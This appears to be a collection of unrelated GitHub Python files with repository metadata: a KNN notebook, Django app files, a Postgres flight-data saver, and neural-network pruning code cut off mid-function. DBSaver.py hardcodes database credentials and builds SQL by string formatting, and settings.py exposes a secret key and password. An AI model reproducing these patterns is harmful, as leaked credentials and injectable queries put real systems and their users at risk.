] | prashant1423.noreply@github.com |
13c72c87f0de714a1c41044ac29c993127faf709 | ab4fdc0bd9ae28944e8e03f07407e7f102f5f876 | /knnclassifier (1).py | 63413ca635056b6d1ec9c0c5e8a5e18de13a760e | [] | no_license | sunnyk-code/MachineLearningAlgorithms | 2a3233cb5f2ca315673d38d5c316d03fa688ca55 | 53fed502503bb44d708cad6caf26c46d019b234c | refs/heads/master | 2022-11-02T10:27:47.485377 | 2020-06-16T16:27:42 | 2020-06-16T16:27:42 | 267,741,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,612 | py | # -*- coding: utf-8 -*-
"""KNNClassifier.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1UuiMkG_dmgC6zyv5E5bCt8fZEDT-Yn5Z
"""
# Commented out IPython magic to ensure Python compatibility.
import itertools
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import NullFormatter
import pandas as pd
import numpy as np
import matplotlib.ticker as ticker
from sklearn import preprocessing
# %matplotlib inline
#Import data from IBM Storage (Telecommunications service customer classification)
!wget -O teleCust1000t.csv https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/teleCust1000t.csv
df = pd.read_csv("teleCust1000t.csv")
df.head()
# num in each class
df['custcat'].value_counts()
df.hist(column = 'income' , bins = 70)
df.columns
toNP = df[['region', 'tenure', 'age', 'marital', 'address', 'income', 'ed','employ', 'retire', 'gender', 'reside', 'custcat']].values
toNP[0:5]
yVals = df['custcat'].values
yVals[0:5]
toNP = preprocessing.StandardScaler().fit(toNP).transform(toNP.astype(float))
toNP[0:5]
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(toNP, yVals, test_size = 0.2, random_state = 6 )
print ('Train set:' , x_train.shape , y_train.shape)
print('Test set: X:' , x_test.shape , y_test.shape)
#Import Classification Methods
from sklearn.neighbors import KNeighborsClassifier
k = 6
neigh = KNeighborsClassifier(k).fit(x_train, y_train)
neigh
yhat = neigh.predict(x_test)
print(yhat[0:5], '--------------------------------------------------', x_test[0:5])
from sklearn import metrics
print("Train set Accuracy: ", metrics.accuracy_score(y_train, neigh.predict(x_train)))
print("Test set Accuracy: ", metrics.accuracy_score(y_test, yhat))
Ks = 10
mean_acc = np.zeros((Ks-1))
std_acc = np.zeros((Ks-1))
ConfustionMx = [];
for n in range(1,Ks):
#Train Model and Predict
neigh = KNeighborsClassifier(n_neighbors = n).fit(x_train,y_train)
yhat=neigh.predict(x_test)
mean_acc[n-1] = metrics.accuracy_score(y_test, yhat)
std_acc[n-1]=np.std(yhat==y_test)/np.sqrt(yhat.shape[0])
mean_acc
plt.plot(range(1,Ks),mean_acc,'g')
plt.fill_between(range(1,Ks),mean_acc - 1 * std_acc,mean_acc + 1 * std_acc, alpha=0.10)
plt.legend(('Accuracy ', '+/- 3xstd'))
plt.ylabel('Accuracy ', color = 'blue')
plt.xlabel('Number of Neighbors (K)', color = 'blue')
plt.tight_layout()
plt.show()
print( "The best accuracy was with", mean_acc.max(), "with k=", mean_acc.argmax()+1) | [
"noreply@github.com"
] | sunnyk-code.noreply@github.com |
dd7d5ffd806027eeac8ec30be404c3f5669a2385 | 834579a021bf6e8c80b6e914c47a726216fb34a8 | /account/migrations/0008_img.py | afeaebe3224ff16518fa793746b2814d7d0aee59 | [] | no_license | HawkinYap/CertificateConsultingandDecision-master | 1ff11012506b87f9d4e55d8453817d52b5df757b | 1aa2d9e167b408dbe97708d882d94087b391a3c9 | refs/heads/master | 2020-05-02T19:51:04.767195 | 2019-08-26T06:56:04 | 2019-08-26T06:56:04 | 178,171,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('account', '0007_remove_userinfo_photo'),
]
operations = [
migrations.CreateModel(
name='IMG',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('img', models.ImageField(upload_to=b'img')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"1316918731@qq.com"
] | 1316918731@qq.com |
53ea51c73541062296a7f58aae02ba7035d7bacd | 9f9faf88da84efe7208020c46d763b79a5be9c51 | /flight_recorder_v2/DBSaver.py | 6b0c150f80785a77c451410ccd570f28547b6ea2 | [] | no_license | imaxus/pite | e759c3c62638afff9fe3c9b914f5cc9f3b92fa5a | 679ff6735833b2bd7c57754bed24f446b4e97a4c | refs/heads/master | 2021-01-21T11:39:24.995718 | 2016-05-25T13:51:41 | 2016-05-25T13:51:41 | 53,480,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,539 | py | import psycopg2
#TODO: przerobic tak zeby obslugiwal odpowiednie dane
class DataSaver:
"""
klasa zapisujaca odpowiednio sformatowane dane do bazy postgres,
format danych : [time,speed,alt,climb,direction,banking], time in second from plane start
"""
def __init__(self, conn):
"""
:param cur: polaczenie do bazy danych
:return: void
"""
self.conn = conn
self.speed = 0
self.alt = 0
self.climb = 0
self.direction = 0
self.banking = 0
self.fuel = 0
self.time = 0
def save_data(self, data):
"""
Funkcja zapisujaca dane do bazy
:param data: tablica zawierajaca wszystkie potrzebne wartosci
:return: true jesli sie powiodlo, false jesli byl blad w bazie
"""
DataSaver.save_speed(self, data[0])
DataSaver.save_alt(self, data[1])
DataSaver.save_climb(self, data[2])
DataSaver.save_dir(self, data[3])
DataSaver.save_bank(self, data[4])
DataSaver.save_fuel(self, data[5])
#stworzenie kursora bazy danych
cur = self.conn.cursor()
try:
statement = 'INSERT INTO flight (speed,alt,climb,direction,banking,time) ' \
'VALUES (%s, %s, %s, %s, %s, %s);' % \
(self.speed, self.alt, self.climb, self.direction, self.banking, self.time)
#print statement
cur.execute(statement)
self.conn.commit()
cur.close()
except:
print "there was an error during data sending"
return False
return True
def save_speed(self, sp):
self.speed = sp
def save_alt(self, alt):
self.alt = alt
def save_climb(self, climb):
self.climb = climb
def save_dir(self, dire):
self.direction = dire
def save_bank(self, bank):
self.banking = bank
def save_fuel(self, ful):
self.fuel = ful
@staticmethod
def connect_to_db():
"""
funkcja tworzaca polaczenie z baza danych
:return: obiekt psycopg2.connect
"""
try:
conn = psycopg2.connect("dbname='pg23138_flight_recorder' user='pg23138_flight_recorder'"
" host='23138.p.tld.pl' password='flight4Reco'")
except:
print "I am unable to connect to the database"
quit()
return conn
@staticmethod
def debug_mode_no_internet():
return 0
| [
"kubek633@o2.pl"
] | kubek633@o2.pl |
d3c10c698576a40dea5ac7270011a9b5bec8be8d | d4a9e76fee70263af0c3bee4c6135578d71909e7 | /pdp_django/pdp_django/urls.py | 53e1b7498c08fd22da9d118b1d461431e7c507be | [] | no_license | minov87/test-develop | 3bd18fdbdf605bf25b3e91f887c4783d386bff9a | 74f245bb6f0405afea1b84ccb8278ae8711fe316 | refs/heads/master | 2021-01-20T14:53:43.765149 | 2017-05-25T10:30:42 | 2017-05-25T10:30:42 | 82,784,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | """pdp_django URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/dev/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.conf.urls.static import static
from django.conf import settings
from pdp_django.views import *
urlpatterns = [
url(r'^$', HomeView.as_view(), name='home'),
url(r'^bookmark/', include('bookmark.urls', namespace='bookmark')),
url(r'^blog/', include('blog.urls', namespace='blog')),
url(r'^photo/', include('photo.urls', namespace='photo')),
url(r'^accounts/', include('django.contrib.auth.urls')),
url(r'^accounts/register/$', UserCreateView.as_view(), name='register'),
url(r'^accounts/register/done/$', UserCreateDoneTV.as_view(), name='register_done'),
url(r'^admin/', admin.site.urls),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT, insecure=True) + static(settings.ASSETS_URL, document_root=settings.ASSETS_ROOT, insecure=True)
handler400 = 'pdp_django.views.custom_400'
handler403 = 'pdp_django.views.custom_403'
handler404 = 'pdp_django.views.custom_404'
handler500 = 'pdp_django.views.custom_500' | [
"minov87@gmail.com"
] | minov87@gmail.com |
10ffffb93ae671078733071d91f6ea745749d061 | 250f58a420b56576c610030d133765de58bf602d | /GaussianNB_Deployment/class_vis.py | e8516ef52d1443b2496db46f963eb1da146c0369 | [] | no_license | SantoshGowrisetty/MachieLearning | 0881c400556b5bf75b1b29e229dfd29c7180a575 | 05b33a45bb43adbb6079b03bf013e67535a51e7c | refs/heads/master | 2021-01-11T14:14:31.406180 | 2017-02-07T16:34:36 | 2017-02-07T16:34:36 | 81,226,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,771 | py | #!/usr/bin/python
import warnings
warnings.filterwarnings("ignore")
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
import pylab as pl
import numpy as np
#import numpy as np
#import matplotlib.pyplot as plt
#plt.ioff()
def prettyPicture(clf, X_test, y_test):
x_min = 0.0; x_max = 1.0
y_min = 0.0; y_max = 1.0
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, m_max]x[y_min, y_max].
h = .01 # step size in the mesh
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.pcolormesh(xx, yy, Z, cmap=pl.cm.seismic)
# Plot also the test points
grade_sig = [X_test[ii][0] for ii in range(0, len(X_test)) if y_test[ii]==0]
bumpy_sig = [X_test[ii][1] for ii in range(0, len(X_test)) if y_test[ii]==0]
grade_bkg = [X_test[ii][0] for ii in range(0, len(X_test)) if y_test[ii]==1]
bumpy_bkg = [X_test[ii][1] for ii in range(0, len(X_test)) if y_test[ii]==1]
plt.scatter(grade_sig, bumpy_sig, color = "b", label="fast")
plt.scatter(grade_bkg, bumpy_bkg, color = "r", label="slow")
plt.legend()
plt.xlabel("bumpiness")
plt.ylabel("grade")
plt.savefig("test.png")
import base64
import json
import subprocess
def output_image(name, format, bytes):
image_start = "BEGIN_IMAGE_f9825uweof8jw9fj4r8"
image_end = "END_IMAGE_0238jfw08fjsiufhw8frs"
data = {}
data['name'] = name
data['format'] = format
data['bytes'] = base64.encodestring(bytes)
print image_start+json.dumps(data)+image_end
| [
"gowrisettysantosh@gmail.com"
] | gowrisettysantosh@gmail.com |
c974282ddec5ca8fae37bd2db65aaa0496018c4d | 0787465a164633ea29c9db369d6019b2a2362b55 | /PrimeTest.py | 8430c954bb18cb9cc74878e87a7b4f0ac8e40938 | [
"MIT"
] | permissive | ReenExeCubeTime/CodewarsPython | 48a97df561098e60f169c923390b2c03b3b2da42 | 5c6ad4e7566503a0adaf430df9b7635a3f94d396 | refs/heads/master | 2021-01-17T09:46:40.400447 | 2017-03-22T22:07:47 | 2017-03-22T22:07:47 | 83,992,852 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | import unittest
from Prime import Prime
class PrimeTest(unittest.TestCase):
def test(self):
prime = Prime()
self.assertEqual(prime.backwards(9900, 10000), [9923, 9931, 9941, 9967])
self.assertEqual(prime.backwards(7000, 7060), [7027, 7043, 7057])
unittest.main() | [
"ipourri@gmail.com"
] | ipourri@gmail.com |
8eb2a53258c8e49c96d2de318c78f58c998f0730 | 6c2f62ee8759a36b3117a469bf947173e033e483 | /homework2a.py | e378d0e0c0f6e963154804391fc6fea74b6035da | [] | no_license | Micah-Zhang/CSCI_2824_Discrete_Structures | e4550fc6d2a0174d06a8d8c08a988aff7d65d311 | 698870a12513444c2a9e23345630d2eec85b3b5a | refs/heads/master | 2021-01-25T13:59:00.695914 | 2018-03-02T22:17:05 | 2018-03-02T22:17:05 | 123,636,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | def tarski(shapes,colors):
for i in range(len(colors)):
for j in range(len(colors)):
if colors[i][j] == 'gray':
if not shapes[i][j] == 'circle':
return False
return True
| [
"micah.zhang@colorado.edu"
] | micah.zhang@colorado.edu |
4c6cba9f06a7e402e11b60ad4652c68f180ec164 | 8c91c598474c266f8a0f3cfedc65a9a572e0cd56 | /Jump_to_python/Chap03/135.py | 7489aa83883ed7b4ca30ba9a5dd78a8704d57697 | [] | no_license | dlpqlb0429/jumptopy | d62b07d141bd2af57b004bdd33382085c8d0d714 | 1c3236a002d55bf2d7a19657b722bc483f890f2e | refs/heads/master | 2021-09-01T12:36:22.366509 | 2017-12-27T01:47:28 | 2017-12-27T01:47:28 | 112,164,324 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 120 | py | for i in range(2,10):
for j in range(1,10):
#print(i*j,end="*")
print(i * j, end="*")
print('*') | [
"dlpqlb@nate.com"
] | dlpqlb@nate.com |
a95fc2d66aa81492e74d579bc3484807408625ce | 953ba7efe0fd58fc069c148dd17a820fb2fa1d3e | /venomsite/bin/pip3 | a5755ff9687c5ea9199dcab334a7d8a0d117ce76 | [] | no_license | wcrober/Venombaseball | 383f5b4b18b5904c771e024a3b35d46eeae4c983 | 18b765384f77704444fd645679d21c9f80034f81 | refs/heads/master | 2020-06-26T03:46:55.358090 | 2019-08-04T22:11:15 | 2019-08-04T22:11:15 | 199,517,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 275 | #!/Users/willroberts/Projects/apps/python/VenomBaseball/venomsite/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"wcrober@gmail.com"
] | wcrober@gmail.com | |
c97d3c61fbb6ae6b32df8c5fe29f82553b89c061 | ae8f3e379a4346eed2bb2fe7fdbe699bb7c47cdc | /TodoProject/TodoProject/settings.py | bfde4d9277b602fcc82c5ac6d4c2250c9aea2def | [] | no_license | snehal2196/Todo-Application | b9d1182b52488b9d07e72200bfa9d540903521cf | 686f88defe3178a28025e6aef7ff4cc80a1e8dc4 | refs/heads/master | 2023-08-02T05:05:21.611015 | 2021-09-26T11:48:46 | 2021-09-26T11:48:46 | 410,532,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,477 | py | """
Django settings for TodoProject project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-&ft9w3m_+79mj0)775m!m^bsr(jn73d!zgb-#!@49ys9@em#1w'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'TodoApp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'TodoProject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates']
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'TodoProject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'TodoDB',
'USER': 'postgres',
'PASSWORD': 'postgres',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"snehalshelar375@gmail.com"
] | snehalshelar375@gmail.com |
0eff00e332304fab72d0531f3669040157296380 | 839d0f5a000bd6701eec79db73edbc9b07f50841 | /PycharmProjects/practice/demoInput.py | 959e98778de980904cbc297d8ef90c5a39b6d2a2 | [] | no_license | eelster/NRPSQuanification | 966a3014e95228b7dff10089c8e807a4574c57a3 | 4fffe39684f397ecd45c72662430393e333b00b4 | refs/heads/master | 2021-01-21T16:39:19.048299 | 2016-07-22T19:55:55 | 2016-07-22T19:55:55 | 64,565,951 | 4 | 0 | null | 2016-07-30T22:06:57 | 2016-07-30T22:06:55 | null | UTF-8 | Python | false | false | 60 | py | person = input('Enter your name: ')
print('Hello', person)
| [
"n.j.davis.college@gmail.com"
] | n.j.davis.college@gmail.com |
544f47b833d6bbc5da3661a0a4c14454cc6224f9 | ec5d820a7e93f66cfa7952f42efe2ab86b87537f | /turbo/urls.py | f092f7eac8ef7bc90d2a89ebf579028efed08286 | [] | no_license | suxingwang837/turbo | 7a86ef033ecbb56a55dd2dba4045b16b082b38af | 2bdb547aff5c88417d0fb10c39d70b823358c0b4 | refs/heads/master | 2023-09-02T22:53:45.469328 | 2021-11-17T02:39:12 | 2021-11-17T02:39:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,236 | py | """turbo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls.static import static
from django.urls import path, include
from django.conf.urls.i18n import i18n_patterns
from turbo import settings
from turbo.urlpatterns import api_urlpatterns, conf_urlpatterns
# URL前缀:http://127.0.0.1:8000/zh-hans/
urlpatterns = i18n_patterns(
path('api/', include(api_urlpatterns)),
)
# URL前缀:http://127.0.0.1:8000/
urlpatterns += [
path('conf/', include(conf_urlpatterns)),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) \
+ static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| [
"zhaojiaxiang1314@foxmail.com"
] | zhaojiaxiang1314@foxmail.com |
d4b8385db5a7de7d7fc90ce283a4730f97a653d5 | a0c45e7a4d8f88ce0704f377b58ea6868c5d98a7 | /src/tf_codes/pruning.py | 0923ad242173b0539423037f1b6f0059904ec85e | [] | no_license | mark-h-meng/stochastic-data-free-pruning | 28338af8fbeb521909ab4270b9b3fbe54dec0d72 | 692813ebd8e630952cc63fef87d2d7dcb4b585b2 | refs/heads/master | 2023-08-11T09:19:27.509503 | 2021-09-07T07:15:13 | 2021-09-07T07:15:13 | 336,969,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,835 | py | import utility.bcolors
import utility.saliency as saliency
import utility.utils as utils
import utility.interval_arithmetic as ia
import utility.simulated_propagation as simprop
import math
import numpy as np
import random
# Saliency-only method
def pruning_baseline(model, big_map, prune_percentage=None,
neurons_manipulated=None,
saliency_matrix=None,
recursive_pruning=False,
bias_aware=False):
# Load the parameters and configuration of the input model
(w, g) = utils.load_param_and_config(model)
num_layers = len(model.layers)
total_pruned_count = 0
layer_idx = 0
pruned_pairs = []
if neurons_manipulated is None:
neurons_manipulated = []
if saliency_matrix is None:
saliency_matrix = []
while layer_idx < num_layers - 1:
pruned_pairs.append([])
if len(neurons_manipulated) < layer_idx+1:
neurons_manipulated.append([])
saliency_matrix.append(None)
# Exclude non FC layers
if "dense" in model.layers[layer_idx].name:
# print("Pruning Operation Looking at Layer", layer_idx)
num_prev_neurons = len(w[layer_idx][0])
num_curr_neurons = len(w[layer_idx][0][0])
num_next_neurons = len(w[layer_idx + 1][0][0])
# curr_weights_neuron_as_rows records the weights parameters originating from the prev layer
curr_weights_neuron_as_rows = np.zeros((num_curr_neurons, num_prev_neurons))
for idx_neuron in range(0, num_curr_neurons):
for idx_prev_neuron in range(0, num_prev_neurons):
curr_weights_neuron_as_rows[idx_neuron][idx_prev_neuron] = w[layer_idx][0][idx_prev_neuron][
idx_neuron]
# next_weights_neuron_as_rows records the weights parameters connecting to the next layer
next_weights_neuron_as_rows = w[layer_idx + 1][0]
if saliency_matrix[layer_idx] is None:
print(" >> Building saliency matrix for layer "+str(layer_idx)+"...")
if bias_aware:
# w[layer_idx][1] records the bias per each neuron in the current layer
saliency_matrix[layer_idx] = saliency.build_saliency_matrix_with_bias(curr_weights_neuron_as_rows,
next_weights_neuron_as_rows,
w[layer_idx][1])
else:
saliency_matrix[layer_idx] = saliency.build_saliency_matrix(curr_weights_neuron_as_rows,
next_weights_neuron_as_rows)
else:
print(" >> Skip building saliency matrix: saliency matrix for layer", layer_idx, "exists.")
import pandas as pd
df = pd.DataFrame(data=saliency_matrix[layer_idx])
# find the candidates neuron to be pruned according to the saliency
if prune_percentage is not None:
num_candidates_to_gen = math.ceil(prune_percentage * num_curr_neurons)
else:
num_candidates_to_gen = 1
top_candidates = utils.get_pairs_with_least_saliency(df, neurons_manipulated[layer_idx], num_candidates=num_candidates_to_gen)
# Just return if there is no candidates to prune
if len(top_candidates) == 0:
return model, neurons_manipulated, [], saliency_matrix
# Now let's process the top_candidate first:
# top_candidate is a list of Series, with key as multi-index, and value as saliency
# and we are going to transform that list into a dictionary to facilitate further ajustment
pruning_pairs_curr_layer_baseline = []
for idx_candidate, pruning_candidate in enumerate(top_candidates):
# Extract the indexes of pruning nodes as a tuple (corr. score is no longer useful since this step)
(node_a, node_b) = pruning_candidate.index.values[0]
'''
# CHANGE on Commit db9c736, to make it consistent with paper
# To standarise the pruning operation for the same pair: we always prune the node with smaller index off
if node_a > node_b:
temp = node_a
node_a = node_b
node_b = temp
'''
pruning_pairs_curr_layer_baseline.append((node_a, node_b))
# Change all weight connecting from node_a to the next layers as the sum of node_a and node_b's ones
# & Reset all weight connecting from node_b to ZEROs
# RECALL: next_weights_neuron_as_rows = w[layer_idx+1][0] ([0] for weight and [1] for bias)
for i in range(0, num_next_neurons):
w[layer_idx + 1][0][node_a][i] = w[layer_idx + 1][0][node_b][i] + w[layer_idx + 1][0][node_a][i]
w[layer_idx + 1][0][node_b][i] = 0
total_pruned_count += 1
# If recursive mode is enabled, the affected neuron (node_a) in the current epoch still
# get a chance to be considered in the next epoch. The pruned one (node_b) won't be
# considered any longer because all its parameters have been zeroed out.
if recursive_pruning:
if neurons_manipulated[layer_idx] is not None:
neurons_manipulated[layer_idx].remove(node_a)
# Save the modified parameters to the model
model.layers[layer_idx + 1].set_weights(w[layer_idx + 1])
pruned_pairs[layer_idx].extend(pruning_pairs_curr_layer_baseline)
layer_idx += 1
print("Pruning accomplished -", total_pruned_count, "units have been pruned")
return model, neurons_manipulated, pruned_pairs, saliency_matrix
# Our greedy method without stochastic heuristic
def pruning_greedy(model, big_map, prune_percentage,
cumulative_impact_intervals,
pooling_multiplier=1,
neurons_manipulated=None,
hyperparamters=(0.5, 0.5),
recursive_pruning=True,
bias_aware=False,
kaggle_credit=False):
# Load the parameters and configuration of the input model
(w, g) = utils.load_param_and_config(model)
num_layers = len(model.layers)
total_pruned_count = 0
layer_idx = 0
pruned_pairs = []
pruning_pairs_dict_overall_scores =[]
if neurons_manipulated is None:
neurons_manipulated = []
e_ij_matrix = []
while layer_idx < num_layers - 1:
cumul_impact_ints_curr_layer = None
pruned_pairs.append([])
if len(neurons_manipulated) < layer_idx+1:
neurons_manipulated.append([])
e_ij_matrix.append(None)
pruning_pairs_dict_overall_scores.append(None)
# Exclude non FC layers
if "dense" in model.layers[layer_idx].name:
# print("Pruning Operation Looking at Layer", layer_idx)
num_prev_neurons = len(w[layer_idx][0])
num_curr_neurons = len(w[layer_idx][0][0])
num_next_neurons = len(w[layer_idx + 1][0][0])
# curr_weights_neuron_as_rows records the weights parameters originating from the prev layer
curr_weights_neuron_as_rows = np.zeros((num_curr_neurons, num_prev_neurons))
for idx_neuron in range(0, num_curr_neurons):
for idx_prev_neuron in range(0, num_prev_neurons):
curr_weights_neuron_as_rows[idx_neuron][idx_prev_neuron] = w[layer_idx][0][idx_prev_neuron][
idx_neuron]
# next_weights_neuron_as_rows records the weights parameters connecting to the next layer
next_weights_neuron_as_rows = w[layer_idx + 1][0]
print(" >> Building saliency matrix for layer " + str(layer_idx) + "...")
if bias_aware:
# w[layer_idx][1] records the bias per each neuron in the current layer
e_ij_matrix[layer_idx] = saliency.build_saliency_matrix_with_bias(curr_weights_neuron_as_rows,
next_weights_neuron_as_rows,
w[layer_idx][1])
else:
e_ij_matrix[layer_idx] = saliency.build_saliency_matrix(curr_weights_neuron_as_rows,
next_weights_neuron_as_rows)
import pandas as pd
df = pd.DataFrame(data=e_ij_matrix[layer_idx])
# find the candidates neuron to be pruned according to the saliency
if prune_percentage is not None:
num_candidates_to_gen = math.ceil(prune_percentage * num_curr_neurons)
else:
num_candidates_to_gen = 1
# find the candidates neuron to be pruned according to the saliency
top_candidates = utils.get_pairs_with_least_saliency(df, neurons_manipulated[layer_idx],
num_candidates=num_candidates_to_gen* pooling_multiplier)
# Just return if there is no candidates to prune
if len(top_candidates) == 0:
return model, neurons_manipulated, [], cumulative_impact_intervals, pruning_pairs_dict_overall_scores
# Now let's process the top_candidate first:
# top_candidate is a list of Series, with key as multi-index, and value as saliency
# and we are going to transform that list into a dictionary to facilitate further ajustment
pruning_pairs_curr_layer_confirmed = []
pruning_pairs_dict_curr_layer_l1_score = {}
pruning_pairs_dict_curr_layer_entropy_score = {}
pruning_pairs_dict_overall_scores[layer_idx] ={}
for idx_candidate, pruning_candidate in enumerate(top_candidates):
# Extract the indexes of pruning nodes as a tuple (corr. score is no longer useful since this step)
(node_a, node_b) = pruning_candidate.index.values[0]
# print(" >> Looking into", (node_a, node_b))
'''
# CHANGE on Commit db9c736, to make it consistent with paper
# To standarise the pruning operation for the same pair: we always prune the node with smaller index off
if node_a > node_b:
temp = node_a
node_a = node_b
node_b = temp
'''
# Below is the hill climbing algorithm to update the top_candidate by dividing the original saliency by
# the l1-norm of the budget preservation list (the higher the better)
pruning_impact_as_interval_next_layer = simprop.calculate_impact_of_pruning_next_layer(model, big_map,
[(node_a, node_b)], layer_idx,
kaggle_credit=kaggle_credit)
# Check is cumulative_impact_interval is none or not, not none means there is already some cumulative impact
# caused by previous pruning actions
if cumul_impact_ints_curr_layer is not None:
pruning_impact_as_interval_next_layer = ia.interval_list_add(pruning_impact_as_interval_next_layer,
cumul_impact_ints_curr_layer)
pruning_impact_as_interval_output_layer = simprop.calculate_bounds_of_output(model,
pruning_impact_as_interval_next_layer,
layer_idx + 1)
big_L = utils.l1_norm_of_intervals(pruning_impact_as_interval_output_layer)
# Use sigmoid logistic to normalize
big_L = 1 / (1 + math.exp(-1 * big_L))
big_ENT = utils.interval_based_entropy(pruning_impact_as_interval_output_layer, similarity_criteria=0.9)
# Use sigmoid logistic to normalize
big_ENT = 1 / (1 + math.exp(-1 * big_ENT))
# Now we are going re-sort the saliency according to the utilization situation of each pair pruning
pruning_pairs_dict_curr_layer_l1_score[(node_a, node_b)] = big_L
# Avoid entropy equals to zero
pruning_pairs_dict_curr_layer_entropy_score[(node_a, node_b)] = big_ENT
(alpha, beta) = hyperparamters
print((node_a, node_b), "Ent:", big_ENT)
# pruning_pairs_dict_overall_scores[(node_a, node_b)] = pruning_candidate.values[0] * (big_L * alpha + big_ENT * beta)
pruning_pairs_dict_overall_scores[layer_idx][(node_a, node_b)] = big_L * alpha + big_ENT * beta
count = 0
pruning_pairs_dict_overall_scores[layer_idx] = dict(sorted(pruning_pairs_dict_overall_scores[layer_idx].items(), key=lambda item: item[1]))
for pair in pruning_pairs_dict_overall_scores[layer_idx]:
if count < num_candidates_to_gen:
pruning_pairs_curr_layer_confirmed.append(pair)
# If recursive mode is enabled, the affected neuron (node_a) in the current epoch still
# get a chance to be considered in the next epoch. The pruned one (node_b) won't be
